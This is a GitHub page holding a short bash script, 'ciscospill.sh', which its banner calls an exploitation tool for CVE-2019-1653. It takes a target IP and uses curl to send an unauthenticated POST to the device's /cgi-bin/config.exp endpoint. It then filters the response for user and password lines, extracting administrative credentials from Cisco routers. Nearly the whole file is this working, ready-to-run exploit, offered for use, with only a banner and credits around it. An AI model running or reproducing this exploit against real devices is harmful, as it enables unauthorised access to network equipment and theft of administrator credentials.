-
Notifications
You must be signed in to change notification settings - Fork 5
/
ciscospill.sh
53 lines (37 loc) · 1.3 KB
/
ciscospill.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/bin/bash
#
# "We're here to observe another kind of code. The bad code." - Root, Person of Interest
#
IP=$1
echo ""
echo ""
echo " ____ _ ____ _ _ _
/ ___(_)___ ___ ___/ ___| _ __ (_) | |
| | | / __|/ __/ _ \___ \| '_ \| | | |
| |___| \__ \ (_| (_) |__) | |_) | | | |
\____|_|___/\___\___/____/| .__/|_|_|_|
|_| "
echo "--------------------------------------------"
echo "An exploitation tool to extract password Information using CVE-2019-1653."
echo "by Shahee Mirza ## Twitter: @shaheemirza"
echo "Thanks to RedTeam Pentesting GmbH"
echo "--------------------------------------------"
if [ -z "$IP" ]
then
echo "++++++++++++++++++++++++++++++++++++++++++++"
echo "USES: ./ciscospill.sh IP"
echo "E.G.: ./ciscospill.sh 192.168.1.1"
echo "++++++++++++++++++++++++++++++++++++++++++++"
exit
fi
echo ""
echo "Exploiting: $IP"
echo ""
echo "++++++++++++++++++++++++++++++++++++++++++++"
echo "Administrative Password Information:"
echo "++++++++++++++++++++++++++++++++++++++++++++"
echo ""
curl -s -k -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" -X POST --data 'submitbkconfig=0' 'https://'$IP'/cgi-bin/config.exp' 2>&1 | grep 'user \|password '
echo ""
echo "--------------------------------------------"
echo ""